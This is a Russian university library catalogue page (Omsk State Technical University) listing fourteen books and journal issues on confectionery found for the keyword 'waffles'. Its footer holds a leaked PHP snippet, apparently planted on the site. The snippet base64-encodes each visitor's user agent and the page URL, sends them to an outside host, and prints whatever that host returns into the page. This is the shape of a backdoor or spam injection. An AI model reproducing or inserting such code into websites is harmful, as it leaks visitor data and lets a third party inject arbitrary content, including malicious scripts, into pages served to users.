Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

183 пользователей


Зарегистрированных: 1 

Сергиенко Александр Александрович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ВАФЛИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 14
1. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
2. 
Сладкий сюрприз [Текст], 1998. - 333 с. [10] вкл. цв. л. с.
Держатели документа (Информация об экземплярах) 
3. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

4. 
Табаторович, Александр Николаевич. Товароведение и экспертиза качества мучных кондитерских изделий [Текст] / А. Н. Табаторович, О. Д. Худякова ; дар. О. Д. Худякова, 2016. - 140 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей мучных кондитерских изделий. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов высших учебных заведений, обучающихся по направлению подготовки 38.03.06 "Торговое дело", профиль Товароведение и экспертиза товаров, при изучении раздела "Кондитерские товары" в рамках дисциплины "Товароведение и экспертиза зерномучных и кондитерских товаров". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением мучных кондитерских изделий.

5. 
Кондитерское и хлебопекарное производство. - Журнал, 2008г. № 10
Оглавление 
  • Лабутина, Н. В. Замороженные сбивные мучные полуфабрикаты в производстве хлебобулочных изделий / Н. В. Лабутина, О. А. Суворов, Е. И. Пономарева. - с.3-6
    Кл. слова: ПРОИЗВОДСТВО хлебобулочных изделий
  • Сырное лакомство. - с.8-9
    Кл. слова: ЧИЗКЕЙК
  • Шаргородский, И. И. Концепция организации логистики сырья на пищевых предприятиях / И. И. Шаргородский. - с.10-11
    Кл. слова: ЛОГИСТИКА - ПРЕДПРИЯТИЕ
  • Технологические аспекты производства мягких вафель. - с.12-14
    Кл. слова: ВАФЛИ
  • Шилкина, Е. П. Ингредиенты для повышения качества хлебобулочных и мучных кондитерских изделий / Е. П. Шилкина. - с.16-18
  • Багманова, Ш. А. Упаковка для хлебобулочных изделий / Ш. А. Багманова. - с.19
    Кл. слова: УПАКОВКА, ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ
  • Сухих, Т. Н. Высокоэтерифицированные пектины для кондитерской промышленности / Т. Н. Сухих, Б. Р. Баширов, Г. П. Ващенко. - с.20-22
    Кл. слова: ПЕКТИН
  • Характеристики первого периода выпечки нарезных батонов. - с.24-28
    Кл. слова: ВЫПЕЧКА БАТОНОВ
  • Лисагорский, В. В. Полимерная упаковка для конфет и плиточного шоколада / В. В. Лисагорский. - с.32-35
    Кл. слова: УПАКОВКА ПОЛИМЕРНАЯ
Держатели документа (Информация об экземплярах) 
6. 
Вокруг света. - Журнал, 2010г. № 8
Оглавление 
  • Пестрый мир. - с.10-14
  • Идеи и открытия. - с.16-18
  • Котов, Павел. Подземная книга рекордов / П. Котов. - с.20-21
  • Терещенко, Алексей. 1010 август / А. Терещенко. - с.22
  • Терещенко, Алексей. 1660 август / А. Терещенко. - с.24
  • Терещенко, Алексей. 1810 август / А. Терещенко. - с.26-28
  • Терещенко, Алексей. 1910 август / А. Терещенко. - с.30
  • Почему у привычного футбольного мяча шашечки двух типов: пятиугольные и шестиугольные?. - с.34
  • Почему вафли в клеточку?. - с.34
  • Эбаноидзе, Игорь. Грузинское застольное многоголосие / И. Эбаноидзе. - с.36-38
  • Леонов, Сергей. "Японский" зонтик / С. Леонов. - с.40
  • Закат над краем земли. Булонь-сюр-Мер, Франция. - с.42-44
  • Шульпяков, Глеб. Мечеть. Место для молитвы и отдыха / Г. Шульпяков. - с.46-50
  • Ветюков, Владимир. Матерь вод: вверх к Тибету / В. Ветюков. - с.52-68
  • Колыбель трех миров. - с.70-71
  • Шерга, Екатерина. Святая земля и ее поклонники / Е. Шерга. - с.72-83
  • Дьяконов, Юрий. Искоренение храма / Ю. Дьяконов. - с.85-89
  • Ковельман, Аркадий. Кесарево сечение / А. Ковельман. - с.90-95
  • Велехов, Леонид. Кока-кома. Боливийский недуг / Л. Велехов. - с.98-112
  • Зубные щетки где-то рядом.... - с.114-115
  • Секреты стоматолога. - с.116-117
  • Щетинистая королева изобретений. - с.117-118
  • Брюн, Евгений. Весь мир в одной проблеме / Е. Брюн. - с.120-121
  • Жуков, Борис. Грезная болезнь / Б. Жуков. - с.122-126
  • Мильчина, Вера. Благородный орнамент / В. Мильчина. - с.128
  • Цветков, Алексей. Сотворение Шекспиров / А. Цветков. - с.130-134
  • Плавинская, Надежда. Пряный аромат судьбы / Н. Плавинская. - с.137-144
  • Иванов, Сергей. Лабиринты премудрости / С. Иванов. - с.146-148
  • Травина, Ирина. Транзитная зона / И. Травина. - с.150-158
  • Лосев, Николай. Невидимые цвета Вселенной / Н. Лосев. - с.160-165
  • Федосеев, Сергей. Оружие крайнего случая / С. Федосеев. - с.166-172
  • Воробьев-Обухов, Алексей. Как жар загребать / А. Воробьев-Обухов. - с.176-178
  • Сердюк, Игорь. Возвышение градуса / И. Сердюк. - с.180-185
7. 
Производство хлеба, хлебобулочных и кондитерских изделий. Торты и пирожные [Текст] / сост. В. А. Шипов, 1999. - 286 с.
Держатели документа (Информация об экземплярах) 
8. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 1 [Текст] / ред. А. И. Барановский, 2012. - 174 с.
Ключевые слова 
Оглавление 
  • Авраменко, К. О. Формат «Free Flow» как инновационное направление в предприятиях индустрии питания / К. О. Авраменко, Н. В. Бураковская. - с.6-7
    Кл. слова: FREE FLOW
  • Агеева, Е. А. Современное состояние и направления развития общественного питания в г. Магнитогорске / Е. А. Агеева, И. А. Долматова. - с.7-12
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ
  • Деменконя, Е. М. Школьное питание как фактор развития здорового поколения / Е. М. Деменконя, М.А. Гриценко. - с.13-16
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Дризнер, Р. А. Современное состояние отрасли общественною питания в г. Екатеринбурге, проблемы кадров, трудоустройства и пути решения / Р. А. Дризнер. - с.16-21
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - КАДРЫ
  • Есина, А. Н. Соответствие испытательной лаборатории "Сертификат" критериям аккредитации / А. Н. Есина. - с.21-25
  • Каня, И. П. Бинарные занятия как средство формирования экспериментальных навыков (из опыта преподавания на технологическом факультете ОмЭИ) / И. П. Каня, О. Ю. Мельникова, А. Н. Королев. - с.25-28
    Кл. слова: ЗАНЯТИЕ БИНАРНОЕ
  • Ковальчук, А. В. Анализ рынка оборудования предприятий питания в России / А. В. Ковальчук, М. А. Шадрин. - с.28-34
    Кл. слова: ОБОРУДОВАНИЕ ПРЕДПРИЯТИЯ ОБЩЕСТВЕННОГО ПИТАНИЯ, РЫНОК ОБОРУДОВАНИЯ ПРЕДПРИЯТИЙ ПИТАНИЯ
  • Конищева, Е. А. Контроль качества меда / Е. А. Конищева, Е. П. Галкова. - с.31-34
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА МЕДА, МЕД
  • Котова, Т. И. Современные тенденции развития рынка предприятии общественного питания г. Магнитогорска / Т. И. Котова, И. А. Долматова, В. Ф. Рябова. - с.34-41
    Кл. слова: ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ
  • Кузьменко, С. П. Реализация системы управления качеством продукции в Сибирском регионе / С. П. Кузьменко, М. А. Тарасова, М. А. Шадрин. - с.41-43
    Кл. слова: УПРАВЛЕНИЕ КАЧЕСТВОМ ПРОДУКЦИИ, СИБИРЬ
  • Кусаинова, Д. А. Гастрономические особенности китайской кухни / Д. А. Кусаинова. - с.44-45
    Кл. слова: КУХНЯ КИТАЙСКАЯ
  • Мустакова, М. М. О необходимости внедрения современных систем менеджмента на предприятия пищевой перерабатывающей промышленности стран таможенного союза / М. М. Мустакова. - с.46-49
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЙ ПРОМЫШЛЕННОСТИ, СОЮЗ ТАМОЖЕННЫЙ, МЕНЕДЖМЕНТ
  • Пестова, П. А. Личность в социальной системе управления сферы услуг / П. А. Пестова. - с.49-54
    Кл. слова: СФЕРА УСЛУГ
  • Плаксина, Н. Н. Изучение аминокислотного состава блюд студенческих столовых / Н. Н. Плаксина, Н. И. Барышникова. - с.54-57
    Кл. слова: АМИНОКИСЛОТА, СТОЛОВАЯ СТУДЕНЧЕСКАЯ
  • Платова, А. В. Применение кейтеринга в Омском регионе на примере банкетного зала "Анна" / А. В. Платова, М. С. Мальцева, М. А. Шадрин. - с.57-59
    Кл. слова: КЕЙТЕРИНГ
  • Репин, М. Н. Характеристика рынка торгового оборудования Омского региона / М. Н. Репин, М. А. Шадрин. - с.59-62
    Кл. слова: ОБОРУДОВАНИЕ ТОРГОВОЕ, ОМСКАЯ ОБЛАСТЬ
  • Рождественская, Л. Н. Целеполагание в системе управления качеством услуг социального питания / Л. Н. Рождественская. - с.62-71
    Кл. слова: ПИТАНИЕ СОЦИАЛЬНОЕ, УПРАВЛЕНИЕ КАЧЕСТВОМ ПИТАНИЯ, КАЧЕСТВО ПИТАНИЯ
  • Седельникова, Д. С. Организация и технология диетического питания в гостиничных комплексах / Д. С. Седельникова. - с.72-74
    Кл. слова: ПИТАНИЕ ДИЕТИЧЕСКОЕ, ГОСТИНИЦА - ПИТАНИЕ
  • Турлубаева, А. Н. Обеспечение качества и безопасности пищевых продуктов / А. Н. Турлубаева, С. В. Стадникова. - с.74-78
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Хлононских, Н. А. Особенности обслуживания тематических мероприятий / Н. А. Хлононских. - с.78-81
    Кл. слова: ОБСЛУЖИВАНИЕ МЕРОПРИЯТИЙ
  • Янушкевич, К. А. Роль международных стандартов в обеспечении качества и безопасности пищевых продуктов / К. А. Янушкевич, Н. А. Смирнова. - с.81-84
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Алексеева, Г. В. Способы повышения качества кондитерских изделий на жировой основе / Г. В. Алексеева, И. А. Ивкова. - с.86-90
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, ВАФЛИ
  • Аникина, Е. Н. Актуальность разработки молочно-злаковых продуктов / Е. Н. Аникина. - с.91-94
    Кл. слова: ПРОДУКТЫ МОЛОЧНО-ЗЛАКОВЫЕ
  • Аникина, Е. Н. Перспективы использования пребиотиков в производстве ферментированных молочных продуктов / Е. Н. Аникина, О. В. Пасько. - с.94-98
    Кл. слова: ПРЕБИОТИКИ
  • Аралбаева, Г. Д. Индустриальные технологии в производстве молочных продуктов на примере ООО «Молочный завод "Лузинский" / Г. Д. Аралбаева, А. Б. Лобкова. - с.98-101
    Кл. слова: МОЛОКО, ЗАВОД МОЛОЧНЫЙ ЛУЗИНСКИЙ
  • Банадысева, И. Д. Особенности формирования потребительского восприятия инноваций в общественном питании / И. Д. Банадысева, Л. Н. Рождественская. - с.98-101
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - ИННОВАЦИИ, ВОСПРИЯТИЕ ПОТРЕБИТЕЛЬСКОЕ
  • Беспалова, Т. А. Гармонизации стандартов продуктов питания / Т. А. Беспалова, О. А. Приступа. - с.107-113
    Кл. слова: СТАНДАРТЫ ПРОДУКТОВ ПИТАНИЯ
  • Васильева, В. Э. Функциональный наполнитель в хлебопечении / В. Э. Васильева. - с.113-116
    Кл. слова: ХЛЕБ, НАПОЛНИТЕЛИ ХЛЕБА
  • Вилемсон, Е. М. Разработка мороженого с пробиотическими свойствами / Е. М. Вилемсон, О. В. Пасько. - с.116-120
    Кл. слова: МОРОЖЕНОЕ
  • Воронкова, М. Н. Зависимость показателей качества хлеба пшеничного от показателей качества зерна пшеницы / М. Н. Воронкова. - с.120-125
    Кл. слова: КАЧЕСТВО ХЛЕБА, КАЧЕСТВО ЗЕРНА, ХЛЕБ
  • Воронова, Е. А. Производство функциональных продуктов на предприятии ООО "Сибирский молочный комбинат" / Е. А. Воронова, Н. И. Захарчснко, А. Г. Анацкая. - с.125-131
    Кл. слова: БИФИДИН
  • Вотинцев, Ю. П. Производство творожных продуктов методом ультрафильтрации / Ю. П. Вотинцев. - с.132-134
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, МЕТОД УЛЬТРАФИЛЬТРАЦИИ
  • Выставной, И. А. Изучение процесса ферментации сливочной основы ассоциациями микроорганизмов / И. А. Выставной. - с.134-140
    Кл. слова: ФЕРМЕНТАЦИЯ, МИКРООРГАНИЗМ
  • Гаврилова, Ю. А. Использование зимологических индикаторов при контроле качества пищевой продукции микробиологическими методами / Ю. А. Гаврилова. - с.141-144
    Кл. слова: ИНДИКАТОР ЗИМОЛОГИЧЕСКИЙ
  • Гатауллина, Ю. Р. Батончики мюсли повышенной биологической ценности на соево-злаковой основе / Ю. Р. Гатауллина. - с.144-147
    Кл. слова: МЮСЛИ, БАТОНЧИКИ МЮСЛИ
  • Герунов, Т. В. Пестициды - потенциальная угроза качеству продуктов питания / Т. В. Герунов, А. П. Козлов, А. В. Леушин. - с.147-150
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ - ПЕСТИЦИДЫ
  • Гончарова, Т. С. Современные способы повышения качества пищевых продуктов / Т. С. Гончарова. - с.150-153
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Дудко, В. В. Современные индустриальные технологии пищевых продуктов / В. В. Дудко, В. А. Кузнецова. - с.153-156
    Кл. слова: ТЕХНОЛОГИЯ ПИЩЕВЫХ ПРОИЗВОДСТВ, ПРОИЗВОДСТВО ПИЩЕВОЕ
  • К вопросу о создании обогащенных продуктов питания / ; Ю. В. Евпатченко, [и др.]. - с.156-160
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ ОБОГАЩЕННЫЕ
  • Оценка безопасности продуктов питания посредством показателя активности воды / ; Ю. В. Евпатченко, [и др.]. - с.160-164
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ
  • Есипова, М. С. Разработка новых рецептур пудинга творожного с плодово-ягодными наполнителями для питания школьников / М. С. Есипова. - с.164-168
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Ефремова, О. М. Отруби как функциональная добавка в хлебобулочных изделиях / О. М. Ефремова. - с.169-171
    Кл. слова: ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ
Держатели документа (Информация об экземплярах) 
9. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

10. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
11. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
12. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
13. 
Рецептуры для кондитера [Текст] : [Сб.] / Авт.-сост. В. Прохоров, 2003. - 316 с.
Держатели документа (Информация об экземплярах) 
14. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] : Учеб. для вузов по специальностям "Технология хлеба, кондит. и макарон. изделий", "Машины и аппараты пищевых пр-в" / А. И. Драгилев, Г. А. Маршалкин, 1999. - 447 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3083 - 18.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.32 с.16 запросов, 0.45c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;